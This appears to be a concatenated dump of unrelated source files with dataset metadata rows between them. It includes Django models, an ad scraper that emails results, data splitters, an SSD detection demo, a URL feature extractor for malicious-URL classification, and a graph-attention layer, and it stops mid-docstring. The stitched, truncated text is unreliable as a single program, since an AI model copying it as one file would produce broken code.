TARGET_COMPATIBLE_WITH_HOST_SELECT = {
"@platforms//os:windows": [_RTOS_NONE],
"@platforms//os:macos": [_RTOS_NONE],
"@platforms//os:linux": [_RTOS_NONE],
"//conditions:default": ["@platforms//:incompatible"],
}
| 39.625 | 79 | 0.729495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,119 | 0.882492 |
732b698a8ba47881b21329d7619d19e7979a1509 | 1,433 | py | Python | subscriptions/models.py | emil-magnusson/py-on-api | 50967ea9d6a189c2c1cb75bd3e2b8ab817077634 | [
"MIT"
]
| null | null | null | subscriptions/models.py | emil-magnusson/py-on-api | 50967ea9d6a189c2c1cb75bd3e2b8ab817077634 | [
"MIT"
]
| 4 | 2021-03-30T14:10:30.000Z | 2021-09-22T19:29:56.000Z | subscriptions/models.py | emil-magnusson/py-on-api | 50967ea9d6a189c2c1cb75bd3e2b8ab817077634 | [
"MIT"
]
| null | null | null | # subscriptions/models.py
import uuid
from django.db import models
from accesses.models import Accesses, Services
class OperationalState(models.Model):
operationalState = models.CharField(primary_key=True, max_length=50)
def __str__(self):
return self.operationalState
class Subscriptions(models.Model):
subscriptionId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
accessId = models.ForeignKey(Accesses, related_name='subscriptions', on_delete=models.PROTECT)
service = models.ForeignKey(Services, on_delete=models.PROTECT)
operationalState = models.ForeignKey(OperationalState, on_delete=models.PROTECT)
spReference = models.CharField(max_length=50, default=uuid.uuid4().hex[:6].upper())
spSubscriptionId = models.UUIDField(default=uuid.uuid4, editable=False)
#option82 = models.OneToOneField(Option82, on_delete=models.PROTECT)
##dhcpIdentifier
note = models.CharField(max_length=350, null=True, blank=True)
##characteristics
def __str__(self):
return '{} - {}'.format(self.service, self.subscriptionId)
class Equipment(models.Model):
subscriptionId = models.ForeignKey(Subscriptions, related_name='equipment', on_delete=models.PROTECT)
vendorId = models.CharField(max_length=250)
macAddress = models.CharField(max_length=250)
def __str__(self):
return '{} - {}'.format(self.vendorId, self.macAddress)
| 37.710526 | 105 | 0.752966 | 1,309 | 0.913468 | 0 | 0 | 0 | 0 | 0 | 0 | 170 | 0.118632 |
732bbfe89e64414c6afc65b3cfb58bb41674d875 | 2,848 | py | Python | leboncrevard/job.py | mclbn/leboncrevard | ee1b2a445eeda8f8561b5c62289b994dff38cfa9 | [
"ISC"
]
| 5 | 2017-03-14T00:28:13.000Z | 2019-02-06T15:38:21.000Z | leboncrevard/job.py | mclbn/leboncrevard | ee1b2a445eeda8f8561b5c62289b994dff38cfa9 | [
"ISC"
]
| null | null | null | leboncrevard/job.py | mclbn/leboncrevard | ee1b2a445eeda8f8561b5c62289b994dff38cfa9 | [
"ISC"
]
| 5 | 2017-02-25T07:31:26.000Z | 2019-02-06T15:38:27.000Z | import smtplib
import time
from email.mime.text import MIMEText
from leboncrevard import scrapper, config
class LbcJob:
def __init__(self, name, url, interval, recipients):
self.name = name
self.url = url
self.scrapper = scrapper.LbcScrapper(url)
self.interval = interval
self.recipients = recipients
self.outfile = name + ".csv"
self.shouldrun = True
def __eq__(self, other):
if self.name != other.name:
return False
if self.url != other.url:
return False
# Ignoring interval and recipients for now
# if self.interval != other.interval:
# return False
# if self.recipients != other.recipients:
# return False
return True
def disable(self):
self.shouldrun = False
def enable(self):
self.shouldrun = False
def run(self):
if not self.shouldrun:
return
if self.scrapper.test_connectivity() is False:
print("No connectivity, aborting for now...")
return False
else:
print("Starting scraping job: " + self.name)
ads = self.scrapper.scrap()
if ads is None:
print("Nothing to scrap for " + self.name + ", aborting job.")
return False
text = ""
hashes = ""
f = open(self.outfile, "a+")
f.seek(0)
lines = f.read()
for ad in ads:
ad_hash = ad.get_hash()
line = "\"" + ad.get_link() + "\"," + ad_hash
if lines.find(line) != -1:
print("Known ad, skipping.")
continue
if lines.find(ad_hash) != -1:
text += "Repost: "
print("Unknown ad, sending...")
text += ad.get_text()
hashes += time.strftime("%d-%m-%y") + "," + line + "\n"
if len(text) > 0:
for recipient in self.recipients:
print(recipient)
try:
print("Sending mail...")
msg = MIMEText(text)
msg['Subject'] = "Nouvelles annonces (" + self.name + ")"
msg['From'] = config.SMTP_USER
msg['To'] = recipient
s = smtplib.SMTP(config.SMTP_SERVER)
s.ehlo()
s.starttls()
s.login(config.SMTP_USER, config.SMTP_PASS)
s.send_message(msg)
s.quit()
f.write(hashes)
except Exception as e:
print(str(e))
pass
f.close()
| 33.904762 | 81 | 0.458567 | 2,738 | 0.961376 | 0 | 0 | 0 | 0 | 0 | 0 | 415 | 0.145716 |
732c359d55e1699fb9b02c52c8e5453f0946a5bf | 13,825 | py | Python | tsl/data/datamodule/splitters.py | TorchSpatiotemporal/tsl | da13493b0cf83826bf41fe78a67e8d4ce1d7a8a0 | [
"MIT"
]
| 4 | 2022-03-21T09:16:33.000Z | 2022-03-30T12:24:30.000Z | tsl/data/datamodule/splitters.py | TorchSpatiotemporal/tsl | da13493b0cf83826bf41fe78a67e8d4ce1d7a8a0 | [
"MIT"
]
| null | null | null | tsl/data/datamodule/splitters.py | TorchSpatiotemporal/tsl | da13493b0cf83826bf41fe78a67e8d4ce1d7a8a0 | [
"MIT"
]
| null | null | null | import functools
from copy import deepcopy
from datetime import datetime
from typing import Mapping, Callable, Union, Tuple, Optional
import numpy as np
from tsl.utils.python_utils import ensure_list
from ..spatiotemporal_dataset import SpatioTemporalDataset
from ..utils import SynchMode
__all__ = [
'Splitter',
'CustomSplitter',
'TemporalSplitter',
'AtTimeStepSplitter',
]
from ...typing import Index
class Splitter:
r"""Base class for splitter module."""
def __init__(self):
self.__indices = dict()
self._fitted = False
self.reset()
def __new__(cls, *args, **kwargs) -> "Splitter":
obj = super().__new__(cls)
# track `fit` calls
obj.fit = cls._track_fit(obj, obj.fit)
return obj
@staticmethod
def _track_fit(obj: "Splitter", fn: callable) -> callable:
"""A decorator to track fit calls.
When ``splitter.fit(...)`` is called, :obj:`splitter.fitted` is set to
:obj:`True`.
Args:
obj: Object whose function will be tracked.
fn: Function that will be wrapped.
Returns:
Decorated method to track :obj:`fit` calls.
"""
@functools.wraps(fn)
def fit(dataset: SpatioTemporalDataset) -> dict:
fn(dataset)
obj._fitted = True
return obj.indices
return fit
def __getstate__(self) -> dict:
# avoids _pickle.PicklingError: Can't pickle <...>: it's not the same
# object as <...>
d = self.__dict__.copy()
del d['fit']
return d
def __call__(self, *args, **kwargs):
return self.split(*args, **kwargs)
def __repr__(self):
lens = ", ".join(map(lambda kv: "%s=%s" % kv, self.lens().items()))
return "%s(%s)" % (self.__class__.__name__, lens)
@property
def indices(self):
return self.__indices
@property
def fitted(self):
return self._fitted
@property
def train_idxs(self):
return self.__indices.get('train')
@property
def val_idxs(self):
return self.__indices.get('val')
@property
def test_idxs(self):
return self.__indices.get('test')
@property
def train_len(self):
return len(self.train_idxs) if self.train_idxs is not None else None
@property
def val_len(self):
return len(self.val_idxs) if self.val_idxs is not None else None
@property
def test_len(self):
return len(self.test_idxs) if self.test_idxs is not None else None
def set_indices(self, train=None, val=None, test=None):
if train is not None:
self.__indices['train'] = train
if val is not None:
self.__indices['val'] = val
if test is not None:
self.__indices['test'] = test
def reset(self):
self.__indices = dict(train=None, val=None, test=None)
self._fitted = False
def lens(self) -> dict:
return dict(train_len=self.train_len, val_len=self.val_len,
test_len=self.test_len)
def copy(self) -> "Splitter":
copy = Splitter()
copy.__dict__ = deepcopy(self.__dict__)
return copy
def fit(self, dataset: SpatioTemporalDataset):
raise NotImplementedError
def split(self, dataset: SpatioTemporalDataset) -> dict:
if self.fitted:
return self.indices
else:
return self.fit(dataset)
class CustomSplitter(Splitter):
def __init__(self, val_split_fn: Callable = None,
test_split_fn: Callable = None,
val_kwargs: Mapping = None,
test_kwargs: Mapping = None,
mask_test_indices_in_val: bool = True):
super(CustomSplitter, self).__init__()
self.val_split_fn = val_split_fn
self.test_split_fn = test_split_fn
self.val_kwargs = val_kwargs or dict()
self.test_kwargs = test_kwargs or dict()
self.mask_test_indices_in_val = mask_test_indices_in_val
@property
def val_policy(self):
return self.val_split_fn.__name__ if callable(
self.val_split_fn) else None
@property
def test_policy(self):
return self.test_split_fn.__name__ if callable(
self.test_split_fn) else None
def fit(self, dataset: SpatioTemporalDataset):
_, test_idxs = self.test_split_fn(dataset, **self.test_kwargs)
val_kwargs = self.val_kwargs
if self.mask_test_indices_in_val and len(test_idxs):
val_kwargs = dict(**self.val_kwargs, mask=test_idxs)
train_idxs, val_idxs = self.val_split_fn(dataset, **val_kwargs)
self.set_indices(train_idxs, val_idxs, test_idxs)
class FixedIndicesSplitter(Splitter):
def __init__(self, train_idxs: Optional[Index] = None,
val_idxs: Optional[Index] = None,
test_idxs: Optional[Index] = None):
super(FixedIndicesSplitter, self).__init__()
self.set_indices(train_idxs, val_idxs, test_idxs)
self._fitted = True
def fit(self, dataset: SpatioTemporalDataset):
pass
class TemporalSplitter(Splitter):
def __init__(self, val_len: int = None, test_len: int = None):
super(TemporalSplitter, self).__init__()
self._val_len = val_len
self._test_len = test_len
def fit(self, dataset: SpatioTemporalDataset):
idx = np.arange(len(dataset))
val_len, test_len = self._val_len, self._test_len
if test_len < 1:
test_len = int(test_len * len(idx))
if val_len < 1:
val_len = int(val_len * (len(idx) - test_len))
test_start = len(idx) - test_len
val_start = test_start - val_len
self.set_indices(idx[:val_start - dataset.samples_offset],
idx[val_start:test_start - dataset.samples_offset],
idx[test_start:])
@staticmethod
def add_argparse_args(parser):
parser.add_argument('--val-len', type=float or int, default=0.1)
parser.add_argument('--test-len', type=float or int, default=0.2)
return parser
class AtTimeStepSplitter(Splitter):
def __init__(self, first_val_ts: Union[Tuple, datetime] = None,
first_test_ts: Union[Tuple, datetime] = None):
super(AtTimeStepSplitter, self).__init__()
self.first_val_ts = first_val_ts
self.first_test_ts = first_test_ts
def fit(self, dataset: SpatioTemporalDataset):
train_idx, test_idx = split_at_ts(dataset, ts=self.first_test_ts)
train_idx, val_idx = split_at_ts(dataset, ts=self.first_val_ts,
mask=test_idx)
return self.set_indices(train_idx, val_idx, test_idx)
@staticmethod
def add_argparse_args(parser):
parser.add_argument('--first-val-ts', type=list or tuple, default=None)
parser.add_argument('--first-test-ts', type=list or tuple, default=None)
return parser
###
def indices_between(dataset: SpatioTemporalDataset,
first_ts: Union[Tuple, datetime] = None,
last_ts: Union[Tuple, datetime] = None):
if first_ts is not None:
if isinstance(first_ts, datetime):
pass
elif isinstance(first_ts, (tuple, list)) and len(first_ts) >= 3:
first_ts = datetime(*first_ts, tzinfo=dataset.index.tzinfo)
else:
raise TypeError("first_ts must be a datetime or a tuple")
if last_ts is not None:
if isinstance(last_ts, datetime):
pass
elif isinstance(last_ts, (tuple, list)) and len(last_ts) >= 3:
last_ts = datetime(*last_ts, tzinfo=dataset.index.tzinfo)
else:
raise TypeError("last_ts must be a datetime or a tuple")
first_day_loc, last_day_loc = dataset.index.slice_locs(first_ts, last_ts)
first_sample_loc = first_day_loc - dataset.horizon_offset
last_sample_loc = last_day_loc - dataset.horizon_offset - 1
indices_from_sample = np.where((first_sample_loc <= dataset.indices) & (
dataset.indices < last_sample_loc))[0]
return indices_from_sample
def split_at_ts(dataset, ts, mask=None):
from_day_idxs = indices_between(dataset, first_ts=ts)
prev_idxs = np.arange(
from_day_idxs[0] if len(from_day_idxs) else len(dataset))
if mask is not None:
from_day_idxs = np.setdiff1d(from_day_idxs, mask)
prev_idxs = np.setdiff1d(prev_idxs, mask)
return prev_idxs, from_day_idxs
def disjoint_months(dataset, months=None, synch_mode=SynchMode.WINDOW):
idxs = np.arange(len(dataset))
months = ensure_list(months)
# divide indices according to window or horizon
if synch_mode is SynchMode.WINDOW:
start = 0
end = dataset.window - 1
elif synch_mode is SynchMode.HORIZON:
start = dataset.horizon_offset
end = dataset.horizon_offset + dataset.horizon - 1
else:
raise ValueError('synch_mode can only be one of %s'
% [SynchMode.WINDOW, SynchMode.HORIZON])
# after idxs
indices = np.asarray(dataset._indices)
start_in_months = np.in1d(dataset.index[indices + start].month, months)
end_in_months = np.in1d(dataset.index[indices + end].month, months)
idxs_in_months = start_in_months & end_in_months
after_idxs = idxs[idxs_in_months]
# previous idxs
months = np.setdiff1d(np.arange(1, 13), months)
start_in_months = np.in1d(dataset.index[indices + start].month, months)
end_in_months = np.in1d(dataset.index[indices + end].month, months)
idxs_in_months = start_in_months & end_in_months
prev_idxs = idxs[idxs_in_months]
return prev_idxs, after_idxs
# SPLIT FUNCTIONS
def split_function_builder(fn, *args, name=None, **kwargs):
def wrapper_split_fn(dataset, length=None, mask=None):
return fn(dataset, length=length, mask=mask, *args, **kwargs)
wrapper_split_fn.__name__ = name or "wrapped__%s" % fn.__name__
return wrapper_split_fn
def subset_len(length, set_size, period=None):
if period is None:
period = set_size
if length is None or length <= 0:
length = 0
if 0. < length < 1.:
length = max(int(length * period), 1)
elif period <= length < set_size:
length = int(length / set_size * period)
elif length > set_size:
raise ValueError("Provided length of %i is greater than set_size %i" % (
length, set_size))
return length
def tail_of_period(iterable, length, mask=None, period=None):
size = len(iterable)
period = period or size
if mask is None:
mask = []
indices = np.arange(size)
length = subset_len(length, size, period)
prev_idxs, after_idxs = [], []
for batch_idxs in [indices[i:i + period] for i in range(0, size, period)]:
batch_idxs = np.setdiff1d(batch_idxs, mask)
prev_idxs.extend(batch_idxs[:len(batch_idxs) - length])
after_idxs.extend(batch_idxs[len(batch_idxs) - length:])
return np.array(prev_idxs), np.array(after_idxs)
def random(iterable, length, mask=None):
size = len(iterable)
if mask is None:
mask = []
indices = np.setdiff1d(np.arange(size), mask)
np.random.shuffle(indices)
split_at = len(indices) - subset_len(length, size)
res = [np.sort(indices[:split_at]), np.sort(indices[split_at:])]
return res
def past_pretest_days(dataset, length, mask):
# get the first day of testing, as the first step of the horizon
keep_until = np.min(mask)
first_testing_day_idx = dataset._indices[keep_until]
first_testing_day = dataset.index[
first_testing_day_idx + dataset.lookback + dataset.delay]
# extract samples before first day of testing through the years
tz_info = dataset.index.tzinfo
years = sorted(set(dataset.index.year))
yearly_testing_loc = []
for year in years:
ftd_year = datetime(year, first_testing_day.month,
first_testing_day.day, tzinfo=tz_info)
yearly_testing_loc.append(dataset.index.slice_locs(ftd_year)[0])
yearly_train_samples = [
np.where(dataset._indices < ytl - dataset.lookback - dataset.delay)[0]
for ytl in yearly_testing_loc]
# filter the years in which there are no such samples
yearly_train_samples = [yts for yts in yearly_train_samples if len(yts) > 0]
# for each year excluding the last take the last "val_len // n_years" samples
yearly_val_len = length // len(yearly_train_samples)
yearly_val_lens = [min(yearly_val_len, len(yts)) for yts in
yearly_train_samples[:-1]]
# for the last year, take the remaining number of samples needed to reach val_len
# this value is always greater or equals to the other so we have at least the same number of validation samples
# coming from the last year than the maximum among all the other years.
yearly_val_lens.append(length - sum(yearly_val_lens))
# finally extracts the validation samples
val_idxs = [idxs[-val_len:] for idxs, val_len in
zip(yearly_train_samples, yearly_val_lens)]
val_idxs = np.concatenate(val_idxs)
# recompute training and test indices
all_idxs = np.arange(len(dataset))
train_idxs = np.setdiff1d(all_idxs, val_idxs)
return train_idxs, val_idxs
def last_month(dataset, mask=None):
if mask is not None:
keep_until = np.min(mask)
last_day_idx = dataset._indices[keep_until]
last_day = dataset.index[last_day_idx]
else:
last_day = dataset.index[-1]
split_day = (last_day.year, last_day.month, 1)
return split_at_ts(dataset, split_day, mask)
# aliases
temporal = TemporalSplitter
at_ts = AtTimeStepSplitter
| 34.051724 | 115 | 0.650922 | 6,604 | 0.477685 | 0 | 0 | 2,003 | 0.144882 | 0 | 0 | 1,570 | 0.113562 |
732d71e2f7609d24712a7e6d1541ad6047bd54bf | 3,483 | py | Python | demo.py | bringBackm/SSD | 6cbc9018fd7365d7c65cf6d4da90c14cced5e542 | [
"MIT"
]
| null | null | null | demo.py | bringBackm/SSD | 6cbc9018fd7365d7c65cf6d4da90c14cced5e542 | [
"MIT"
]
| null | null | null | demo.py | bringBackm/SSD | 6cbc9018fd7365d7c65cf6d4da90c14cced5e542 | [
"MIT"
]
| null | null | null | import glob
import os
import torch
from PIL import Image
from tqdm import tqdm
from ssd.config import cfg
from ssd.data.datasets import COCODataset, VOCDataset
from ssd.modeling.predictor import Predictor
from ssd.modeling.vgg_ssd import build_ssd_model
import argparse
import numpy as np
from ssd.utils.viz import draw_bounding_boxes
def run_demo(cfg, weights_file, iou_threshold, score_threshold, images_dir, output_dir, dataset_type):
if dataset_type == "voc":
class_names = VOCDataset.class_names
elif dataset_type == 'coco':
class_names = COCODataset.class_names
else:
raise NotImplementedError('Not implemented now.')
device = torch.device(cfg.MODEL.DEVICE)
model = build_ssd_model(cfg)
model.load(weights_file)
print('Loaded weights from {}.'.format(weights_file))
model = model.to(device)
predictor = Predictor(cfg=cfg,
model=model,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
device=device)
cpu_device = torch.device("cpu")
image_paths = glob.glob(os.path.join(images_dir, '*.jpg'))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
for image_path in tqdm(image_paths):
image = Image.open(image_path).convert("RGB")
image = np.array(image)
output = predictor.predict(image)
boxes, labels, scores = [o.to(cpu_device).numpy() for o in output]
drawn_image = draw_bounding_boxes(image, boxes, labels, scores, class_names).astype(np.uint8)
image_name = os.path.basename(image_path)
Image.fromarray(drawn_image).save(os.path.join(output_dir, image_name))
def main():
parser = argparse.ArgumentParser(description="SSD Demo.")
parser.add_argument(
"--config-file",
default="configs/ssd300_voc0712.yaml",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument("--weights", default='weights/ssd300_voc0712_mAP77.83.pth',type=str, help="Trained weights.")
parser.add_argument("--iou_threshold", type=float, default=0.5)
parser.add_argument("--score_threshold", type=float, default=0.5)
parser.add_argument("--images_dir", default='demo', type=str, help='Specify a image dir to do prediction.')
parser.add_argument("--output_dir", default='demo/result', type=str, help='Specify a image dir to save predicted images.')
parser.add_argument("--dataset_type", default="voc", type=str, help='Specify dataset type. Currently support voc and coco.')
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
print(args)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
print("Loaded configuration file {}".format(args.config_file))
#with open(args.config_file, "r") as cf:
# config_str = "\n" + cf.read()
# print(config_str)
#print("Running with config:\n{}".format(cfg))
run_demo(cfg=cfg,
weights_file=args.weights,
iou_threshold=args.iou_threshold,
score_threshold=args.score_threshold,
images_dir=args.images_dir,
output_dir=args.output_dir,
dataset_type=args.dataset_type)
if __name__ == '__main__':
main()
| 35.540816 | 128 | 0.669251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.20155 |
732dd28306f669f7a332fd1f3c061993b13d2ff5 | 800 | py | Python | quiz/bot/storage/shelter.py | shubham-king/guess-the-melody | 1658a17f41b39cfd212175a03e043b3be7bc0e56 | [
"MIT"
]
| 4 | 2019-06-15T15:32:43.000Z | 2020-02-21T09:45:36.000Z | quiz/bot/storage/shelter.py | shubham-king/guess-the-melody | 1658a17f41b39cfd212175a03e043b3be7bc0e56 | [
"MIT"
]
| 4 | 2020-07-05T07:20:26.000Z | 2021-04-25T21:05:53.000Z | quiz/bot/storage/shelter.py | shubham-king/guess-the-melody | 1658a17f41b39cfd212175a03e043b3be7bc0e56 | [
"MIT"
]
| 7 | 2020-06-13T20:11:41.000Z | 2021-11-09T07:47:02.000Z | from shelve import DbfilenameShelf, open
from typing import Type
from quiz.config import Config
from quiz.types import ContextManager, DictAccess
class Shelter(ContextManager, DictAccess):
"""Interface for bot shelter."""
def __init__(self, config: Type[Config]) -> None:
self._shelter: DbfilenameShelf = open(config.shelve_name)
def __enter__(self) -> "Shelter":
return self
def __getitem__(self, item: str) -> int:
return self._shelter[item]
def __setitem__(self, key: str, value: int) -> None:
self._shelter[key] = value
def __delitem__(self, key: str) -> None:
del self._shelter[key]
def close(self) -> None:
self._shelter.close()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.close()
| 26.666667 | 65 | 0.665 | 651 | 0.81375 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.05125 |
73321c0acbdf4ab01ceed6d568aada4c5a634a97 | 125 | py | Python | src/applications/task310/apps.py | SergeyNazarovSam/SergeyPythonfirst | fd2bddf1f5ba28c6802be921177917f369f7ef2e | [
"MIT"
]
| 2 | 2020-12-17T20:19:21.000Z | 2020-12-22T12:46:43.000Z | src/applications/task310/apps.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
]
| 4 | 2021-04-20T08:40:30.000Z | 2022-02-10T07:50:30.000Z | src/applications/task310/apps.py | SergeyNazarovSam/SergeyPythonfirst | fd2bddf1f5ba28c6802be921177917f369f7ef2e | [
"MIT"
]
| 1 | 2021-02-10T06:42:19.000Z | 2021-02-10T06:42:19.000Z | from django.apps import AppConfig
class Task310Config(AppConfig):
label = "task310"
name = f"applications.{label}"
| 17.857143 | 34 | 0.72 | 88 | 0.704 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.256 |
7332ce4b3b7c7b972d457f074400634cb61ce765 | 5,686 | py | Python | scripts/data_creation_v3.py | deepchecks/url_classification_dl | 029fddb78e019cf288adcc2fd46be3435536d469 | [
"CC0-1.0"
]
| 3 | 2021-05-22T09:20:54.000Z | 2022-03-14T15:58:17.000Z | scripts/data_creation_v3.py | deepchecks/url_classification_dl | 029fddb78e019cf288adcc2fd46be3435536d469 | [
"CC0-1.0"
]
| 1 | 2021-11-15T11:22:48.000Z | 2021-12-11T13:32:19.000Z | scripts/data_creation_v3.py | deepchecks/url_classification_dl | 029fddb78e019cf288adcc2fd46be3435536d469 | [
"CC0-1.0"
]
| 6 | 2021-05-15T17:46:22.000Z | 2022-03-24T11:24:59.000Z | import whois
from datetime import datetime, timezone
import math
import pandas as pd
import numpy as np
from pyquery import PyQuery
from requests import get
class UrlFeaturizer(object):
def __init__(self, url):
self.url = url
self.domain = url.split('//')[-1].split('/')[0]
self.today = datetime.now().replace(tzinfo=None)
try:
self.whois = whois.query(self.domain).__dict__
except:
self.whois = None
try:
self.response = get(self.url)
self.pq = PyQuery(self.response.text)
except:
self.response = None
self.pq = None
## URL string Features
def entropy(self):
string = self.url.strip()
prob = [float(string.count(c)) / len(string) for c in dict.fromkeys(list(string))]
entropy = sum([(p * math.log(p) / math.log(2.0)) for p in prob])
return entropy
def ip(self):
string = self.url
flag = False
if ("." in string):
elements_array = string.strip().split(".")
if(len(elements_array) == 4):
for i in elements_array:
if (i.isnumeric() and int(i)>=0 and int(i)<=255):
flag=True
else:
flag=False
break
if flag:
return 1
else:
return 0
def numDigits(self):
digits = [i for i in self.url if i.isdigit()]
return len(digits)
def urlLength(self):
return len(self.url)
def numParameters(self):
params = self.url.split('&')
return len(params) - 1
def numFragments(self):
fragments = self.url.split('#')
return len(fragments) - 1
def numSubDomains(self):
subdomains = self.url.split('http')[-1].split('//')[-1].split('/')
return len(subdomains)-1
def domainExtension(self):
ext = self.url.split('.')[-1].split('/')[0]
return ext
## URL domain features
def hasHttp(self):
return 'http:' in self.url
def hasHttps(self):
return 'https:' in self.url
def daysSinceRegistration(self):
if self.whois and self.whois['creation_date']:
diff = self.today - self.whois['creation_date'].replace(tzinfo=None)
diff = str(diff).split(' days')[0]
return diff
else:
return 0
def daysSinceExpiration(self):
if self.whois and self.whois['expiration_date']:
diff = self.whois['expiration_date'].replace(tzinfo=None) - self.today
diff = str(diff).split(' days')[0]
return diff
else:
return 0
## URL Page Features
def bodyLength(self):
if self.pq is not None:
return len(self.pq('html').text()) if self.urlIsLive else 0
else:
return 0
def numTitles(self):
if self.pq is not None:
titles = ['h{}'.format(i) for i in range(7)]
titles = [self.pq(i).items() for i in titles]
return len([item for s in titles for item in s])
else:
return 0
def numImages(self):
if self.pq is not None:
return len([i for i in self.pq('img').items()])
else:
return 0
def numLinks(self):
if self.pq is not None:
return len([i for i in self.pq('a').items()])
else:
return 0
def scriptLength(self):
if self.pq is not None:
return len(self.pq('script').text())
else:
return 0
def specialCharacters(self):
if self.pq is not None:
bodyText = self.pq('html').text()
schars = [i for i in bodyText if not i.isdigit() and not i.isalpha()]
return len(schars)
else:
return 0
def scriptToSpecialCharsRatio(self):
v = self.specialCharacters()
if self.pq is not None and v!=0:
sscr = self.scriptLength()/v
else:
sscr = 0
return sscr
def scriptTobodyRatio(self):
v = self.bodyLength()
if self.pq is not None and v!=0:
sbr = self.scriptLength()/v
else:
sbr = 0
return sbr
def bodyToSpecialCharRatio(self):
v = self.bodyLength()
if self.pq is not None and v!=0:
bscr = self.specialCharacters()/v
else:
bscr = 0
return bscr
def urlIsLive(self):
return self.response == 200
def run(self):
data = {}
data['entropy'] = self.entropy()
data['numDigits'] = self.numDigits()
data['urlLength'] = self.urlLength()
data['numParams'] = self.numParameters()
data['hasHttp'] = self.hasHttp()
data['hasHttps'] = self.hasHttps()
data['urlIsLive'] = self.urlIsLive()
data['bodyLength'] = self.bodyLength()
data['numTitles'] = self.numTitles()
data['numImages'] = self.numImages()
data['numLinks'] = self.numLinks()
data['scriptLength'] = self.scriptLength()
data['specialChars'] = self.specialCharacters()
data['ext'] = self.domainExtension()
data['dsr'] = self.daysSinceRegistration()
data['dse'] = self.daysSinceExpiration()
data['sscr'] = self.scriptToSpecialCharsRatio()
data['sbr'] = self.scriptTobodyRatio()
data['bscr'] = self.bodyToSpecialCharRatio()
data['num_%20'] = self.url.count("%20")
data['num_@'] = self.url.count("@")
data['has_ip'] = self.ip()
return data
| 29.769634 | 90 | 0.536933 | 5,527 | 0.972037 | 0 | 0 | 0 | 0 | 0 | 0 | 436 | 0.07668 |
7333549135a1f86b79763216b9dd3553195359bb | 5,175 | py | Python | rgnn_at_scale/models/gat.py | sigeisler/robustness_of_gnns_at_scale | 0f4844711ace599f54c2abc760b53680a80d6a32 | [
"MIT"
]
| 11 | 2021-11-01T19:54:41.000Z | 2022-01-27T11:34:11.000Z | rgnn_at_scale/models/gat.py | sigeisler/robustness_of_gnns_at_scale | 0f4844711ace599f54c2abc760b53680a80d6a32 | [
"MIT"
]
| 1 | 2021-12-13T21:14:56.000Z | 2022-01-16T17:37:36.000Z | rgnn_at_scale/models/gat.py | sigeisler/robustness_of_gnns_at_scale | 0f4844711ace599f54c2abc760b53680a80d6a32 | [
"MIT"
]
| 2 | 2021-11-05T00:42:18.000Z | 2022-01-12T10:10:30.000Z | from typing import Any, Dict, Tuple
import torch
from torch_geometric.nn import GATConv
from torch_sparse import SparseTensor, set_diag
from rgnn_at_scale.aggregation import ROBUST_MEANS
from rgnn_at_scale.models.gcn import GCN
class RGATConv(GATConv):
"""Extension of Pytorch Geometric's `GCNConv` to execute a robust aggregation function:
- soft_k_medoid
- soft_medoid (not scalable)
- k_medoid
- medoid (not scalable)
- dimmedian
Parameters
----------
mean : str, optional
The desired mean (see above for the options), by default 'soft_k_medoid'
mean_kwargs : Dict[str, Any], optional
Arguments for the mean, by default dict(k=64, temperature=1.0, with_weight_correction=True)
"""
def __init__(self, mean='soft_k_medoid',
mean_kwargs: Dict[str, Any] = dict(k=64, temperature=1.0, with_weight_correction=True),
**kwargs):
kwargs['in_channels'] = 2 * [kwargs['in_channels']]
super().__init__(**kwargs)
self._mean = ROBUST_MEANS[mean] if mean is not None else None
self._mean_kwargs = mean_kwargs
def forward(self, arguments: Tuple[torch.Tensor, SparseTensor] = None) -> torch.Tensor:
"""Predictions based on the input.
Parameters
----------
arguments : Sequence[torch.Tensor]
[x, edge indices] or [x, edge indices, edge weights], by default None
Returns
-------
torch.Tensor
the output of `GCNConv`.
Raises
------
NotImplementedError
if the arguments are not of length 2 or 3
"""
if len(arguments) == 2:
x, edge_index = arguments
edge_weight = None
elif len(arguments) == 3:
x, edge_index, edge_weight = arguments
else:
raise NotImplementedError("This method is just implemented for two or three arguments")
assert isinstance(edge_index, SparseTensor), 'GAT requires a SparseTensor as input'
assert edge_weight is None, 'The weights must be passed via a SparseTensor'
H, C = self.heads, self.out_channels
assert x.dim() == 2, 'Static graphs not supported in `GATConv`.'
x_l = x_r = self.lin_l(x).view(-1, H, C)
alpha_l = (x_l * self.att_l).sum(dim=-1)
alpha_r = (x_r * self.att_r).sum(dim=-1)
if self.add_self_loops:
edge_index = set_diag(edge_index)
# propagate_type: (x: OptPairTensor, alpha: OptPairTensor)
out = self.propagate(edge_index, x=(x_l, x_r),
alpha=(alpha_l, alpha_r))
alpha = self._alpha * edge_index.storage.value()[:, None]
self._alpha = None
if self.concat:
out = out.view(-1, self.heads * self.out_channels)
else:
out = out.mean(dim=1)
if self.bias is not None:
out += self.bias
attention_matrix = edge_index.set_value(alpha, layout='coo')
attention_matrix.storage._value = attention_matrix.storage._value.squeeze()
x = self.lin_l(x)
if self._mean is not None:
x = self._mean(attention_matrix, x, **self._mean_kwargs)
else:
x = attention_matrix @ x
x += self.bias
return x
class RGAT(GCN):
"""Generic Reliable Graph Neural Network (RGNN) implementation which currently supports a GCN architecture with the
aggregation functions:
- soft_k_medoid
- soft_medoid (not scalable)
- k_medoid
- medoid (not scalable)
- dimmedian
and with the adjacency preprocessings:
- SVD: Negin Entezari, Saba A. Al-Sayouri, Amirali Darvishzadeh, and Evangelos E. Papalexakis. All you need is Low
(rank): Defending against adversarial attacks on graphs.
- GDC: Johannes Klicpera, Stefan Weißenberger, and Stephan Günnemann. Diffusion Improves Graph Learning.
- Jaccard: Huijun Wu, Chen Wang, Yuriy Tyshetskiy, Andrew Docherty, Kai Lu, and Liming Zhu. Adversarial examples
for graph data: Deep insights into attack and defense.
Parameters
----------
mean : str, optional
The desired mean (see above for the options), by default 'soft_k_medoid'
